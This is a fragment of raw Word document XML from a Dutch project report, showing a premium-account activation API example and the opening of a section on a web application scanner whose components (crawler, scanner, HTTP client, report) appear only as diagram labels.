              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253102080" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3E796F11" wp14:editId="0B2E1479">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>610235</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1885315</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4762500" cy="571500"/>
                <wp:effectExtent l="0" t="0" r="0" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="611" name="Text Box 611"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="47625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BCF71" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A0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96F11" id="Text Box 611" o:spid="_x0000_s1229" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:48.05pt;margin-top:148.45pt;width:375pt;height:45pt;z-index:2531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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="538BCF71" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4381A0C1" w14:textId="1EC1C75C" w:rsidR="009F1C46" w:rsidRDefault="009F1C46" w:rsidP="008B186E"/>
    <w:p w14:paraId="738EB91E" w14:textId="3181358A" w:rsidR="004C751F" w:rsidRDefault="004C751F" w:rsidP="008B186E"/>
    <w:p w14:paraId="771A4C8C" w14:textId="58DA053F" w:rsidR="00696758" w:rsidRDefault="00957BFC" w:rsidP="008B186E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253108224" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3F08271D" wp14:editId="0DA7E5E1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-24765</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>277495</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5715000" cy="571500"/>
                <wp:effectExtent l="0" t="0" r="25400" b="38100"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="216" name="Text Box 216"/>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9CB50D" w14:textId="670E32AB" w:rsidR="002A05E5" w:rsidRPr="00957BFC" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Dit stukje javascript code is voor het activeren van een premiumaccount. De </w:t>
                            </w:r>
                            <w:hyperlink r:id="rId107" w:history="1">
                              <w:r w:rsidRPr="00CB7761">
                                <w:rPr>
                                  <w:rStyle w:val="Hyperlink"/>
                                  <w:lang w:val="en-US"/>
                                </w:rPr>
                                <w:t>http://localhost:8000/active/</w:t>
                              </w:r>
                            </w:hyperlink>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> is d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8271D" id="Text Box 216" o:spid="_x0000_s1230" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-1.95pt;margin-top:21.85pt;width:450pt;height:45pt;z-index:2531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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6E9CB50D" w14:textId="670E32AB" w:rsidR="002A05E5" w:rsidRPr="00957BFC" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Dit stukje javascript code is voor het activeren van een premiumaccount. De </w:t>
                      </w:r>
                      <w:hyperlink r:id="rId108" w:history="1">
                        <w:r w:rsidRPr="00CB7761">
                          <w:rPr>
                            <w:rStyle w:val="Hyperlink"/>
                            <w:lang w:val="en-US"/>
                          </w:rPr>
                          <w:t>http://localhost:8000/active/</w:t>
                        </w:r>
                      </w:hyperlink>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> is de Route.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006C10FF" w:rsidRPr="006C10FF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Een voorbeeld van de API in actie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB89072" w14:textId="0EB3E915" w:rsidR="007B5E44" w:rsidRPr="007B5E44" w:rsidRDefault="00957BFC" w:rsidP="008B186E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253107200" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C5F81BD" wp14:editId="7963D0D3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-24130</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>772795</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="1682750"/>
            <wp:effectExtent l="25400" t="25400" r="34290" b="1905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pi call.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168275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4560A869" w14:textId="03CE43EF" w:rsidR="004C751F" w:rsidRDefault="00F03C4F" w:rsidP="008B186E">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253227008" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1B10EC50" wp14:editId="212C8870">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-88265</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1600200</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1397000" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="0" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="824" name="Text Box 824"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1397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F7CA22" w14:textId="5E734353" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Figuur 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0EC50" id="Text Box 824" o:spid="_x0000_s1231" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-6.95pt;margin-top:126pt;width:110pt;height:27pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="51F7CA22" w14:textId="5E734353" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Figuur 5.18</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DCE999" w14:textId="237FC173" w:rsidR="004C751F" w:rsidRDefault="00D041CD" w:rsidP="008B186E">
      <w:pPr>
        <w:sectPr w:rsidR="004C751F" w:rsidSect="001958CD">
          <w:headerReference w:type="first" r:id="rId110"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="0" w:right="1418" w:bottom="0" w:left="1418" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E1E1D4" w14:textId="77777777" w:rsidR="001958CD" w:rsidRDefault="001958CD" w:rsidP="00163804">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="276887F4" w14:textId="0A4E6909" w:rsidR="008B186E" w:rsidRDefault="00DF1B5D" w:rsidP="00163804">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00726BA6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253097984" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="65846B37" wp14:editId="3729E8A9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-913765</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-916903</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="816" name="Rectangle 8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BE5F6" id="Rectangle 816" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.95pt;margin-top:-72.15pt;width:25pt;height:1031.7pt;z-index:-2502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qvYJU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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00557C84">
        <w:t xml:space="preserve">5.6 </w:t>
      </w:r>
      <w:r w:rsidR="00163804">
        <w:t>Webapplicatie scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47953191" w14:textId="09254E07" w:rsidR="00770C08" w:rsidRDefault="00F34BC5" w:rsidP="00770C08">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253155328" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6A6262DD" wp14:editId="5735F8D1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-25400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>213360</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6159500" cy="681990"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="699" name="Text Box 699"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6159500" cy="68199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ABC8748" w14:textId="166AEC6E" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>In dit deel zal ik de drie hoofdcomponenten van de webapplicatie scanner behandelen. Omdat het geen visueel aspect heeft zal ik code snippets laten zien van de belangrijkste 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262DD" id="Text Box 699" o:spid="_x0000_s1232" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-2pt;margin-top:16.8pt;width:485pt;height:53.7pt;z-index:2531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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1ABC8748" w14:textId="166AEC6E" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>In dit deel zal ik de drie hoofdcomponenten van de webapplicatie scanner behandelen. Omdat het geen visueel aspect heeft zal ik code snippets laten zien van de belangrijkste functies.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="419B749F" w14:textId="77777777" w:rsidR="00770C08" w:rsidRPr="00770C08" w:rsidRDefault="00770C08" w:rsidP="00770C08"/>
    <w:p w14:paraId="57152FB8" w14:textId="750C00F7" w:rsidR="00163804" w:rsidRDefault="00F03C4F" w:rsidP="00163804">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253228032" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="688DF46C" wp14:editId="35B842C3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-24765</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6061075</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1079500" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="0" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="825" name="Text Box 825"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1079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E2D4C" w14:textId="3A40164F" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Figuur 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DF46C" id="Text Box 825" o:spid="_x0000_s1233" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-1.95pt;margin-top:477.25pt;width:85pt;height:27pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1B4E2D4C" w14:textId="3A40164F" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Figuur 5.19</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09248" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="790E2DF3" wp14:editId="2C665EC1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-24130</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>327660</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6096000" cy="5715000"/>
                <wp:effectExtent l="0" t="0" r="25400" b="25400"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21600"/>
                    <wp:lineTo x="21600" y="21600"/>
                    <wp:lineTo x="21600" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="226" name="Rectangle 226"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6096000" cy="5715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2E195" id="Rectangle 226" o:spid="_x0000_s1026" style="position:absolute;margin-left:-1.9pt;margin-top:25.8pt;width:480pt;height:450pt;z-index:2531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" filled="f" strokecolor="#c00000" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="004347F1">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253111296" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="693C6C21" wp14:editId="56DE621A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>801370</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2079625</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318000" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="0" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="649" name="Text Box 649"/>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DAB731" w14:textId="3B39C73A" w:rsidR="002A05E5" w:rsidRPr="00C85041" w:rsidRDefault="002A05E5" w:rsidP="00C85041">
                            <w:pPr>
                              <w:jc w:val="cente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C6C21" id="Text Box 649" o:spid="_x0000_s1234" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:63.1pt;margin-top:163.75pt;width:340pt;height:27pt;z-index:2531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" fillcolor="#fff2cc [663]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="67DAB731" w14:textId="3B39C73A" w:rsidR="002A05E5" w:rsidRPr="00C85041" w:rsidRDefault="002A05E5" w:rsidP="00C85041">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Crawl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3344" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="17256D9D" wp14:editId="1DDD8906">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>803275</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3340735</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318000" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="0" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="650" name="Text Box 650"/>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C51008" w14:textId="66A8FFB7" w:rsidR="002A05E5" w:rsidRPr="00C85041" w:rsidRDefault="002A05E5" w:rsidP="00C85041">
                            <w:pPr>
                              <w:jc w:val="cente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56D9D" id="Text Box 650" o:spid="_x0000_s1235" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:63.25pt;margin-top:263.05pt;width:340pt;height:27pt;z-index:2531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" fillcolor="#fff2cc [663]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2CC51008" w14:textId="66A8FFB7" w:rsidR="002A05E5" w:rsidRPr="00C85041" w:rsidRDefault="002A05E5" w:rsidP="00C85041">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Scann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6416" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="544178FE" wp14:editId="04C53DB9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>800735</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2419985</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318000" cy="574040"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="657" name="Text Box 657"/>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25F7B5" w14:textId="15B8F312" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00C85041">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>PHP Crawl</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2BC3E871" w14:textId="7351BFF8" w:rsidR="002A05E5" w:rsidRPr="00C85041" w:rsidRDefault="002A05E5" w:rsidP="00C85041">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>DOM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178FE" id="Text Box 657" o:spid="_x0000_s1236" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:63.05pt;margin-top:190.55pt;width:340pt;height:45.2pt;z-index:2531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" fillcolor="#ffe599 [1303]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7F25F7B5" w14:textId="15B8F312" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00C85041">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>PHP Crawl</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2BC3E871" w14:textId="7351BFF8" w:rsidR="002A05E5" w:rsidRPr="00C85041" w:rsidRDefault="002A05E5" w:rsidP="00C85041">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>DOMCrawl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5392" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0CE35CF8" wp14:editId="599D5B52">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>802005</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4482465</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318000" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="0" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="656" name="Text Box 656"/>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C66FC20" w14:textId="4424E23A" w:rsidR="002A05E5" w:rsidRPr="00C85041" w:rsidRDefault="002A05E5" w:rsidP="00C85041">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>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35CF8" id="Text Box 656" o:spid="_x0000_s1237" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:63.15pt;margin-top:352.95pt;width:340pt;height:27pt;z-index:2531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" fillcolor="#fff2cc [663]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7C66FC20" w14:textId="4424E23A" w:rsidR="002A05E5" w:rsidRPr="00C85041" w:rsidRDefault="002A05E5" w:rsidP="00C85041">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Rapport</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8464" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="74BB3678" wp14:editId="781F08B1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>801370</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3676015</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318000" cy="574040"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="658" name="Text Box 658"/>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72EFD7" w14:textId="452B1023" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00E416AF">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>GuzzleHttp</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="570064E2" w14:textId="2016E6FC" w:rsidR="002A05E5" w:rsidRPr="00C85041" w:rsidRDefault="002A05E5" w:rsidP="00E416AF">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>C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B3678" id="Text Box 658" o:spid="_x0000_s1238" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:63.1pt;margin-top:289.45pt;width:340pt;height:45.2pt;z-index:2531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" fillcolor="#ffe599 [1303]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5C72EFD7" w14:textId="452B1023" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00E416AF">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>GuzzleHttp</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="570064E2" w14:textId="2016E6FC" w:rsidR="002A05E5" w:rsidRPr="00C85041" w:rsidRDefault="002A05E5" w:rsidP="00E416AF">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Curl</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20512" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="24E74820" wp14:editId="7CEBAB7E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>800735</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4820285</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318000" cy="345440"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="670" name="Text Box 670"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4318000"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9439CE" w14:textId="5BA7443D" w:rsidR="002A05E5" w:rsidRPr="00C85041" w:rsidRDefault="002A05E5" w:rsidP="00C85041">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Http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74820" id="Text Box 670" o:spid="_x0000_s1239" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:63.05pt;margin-top:379.55pt;width:340pt;height:27.2pt;z-index:2531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" fillcolor="#ffe599 [1303]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="279439CE" w14:textId="5BA7443D" w:rsidR="002A05E5" w:rsidRPr="00C85041" w:rsidRDefault="002A05E5" w:rsidP="00C85041">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
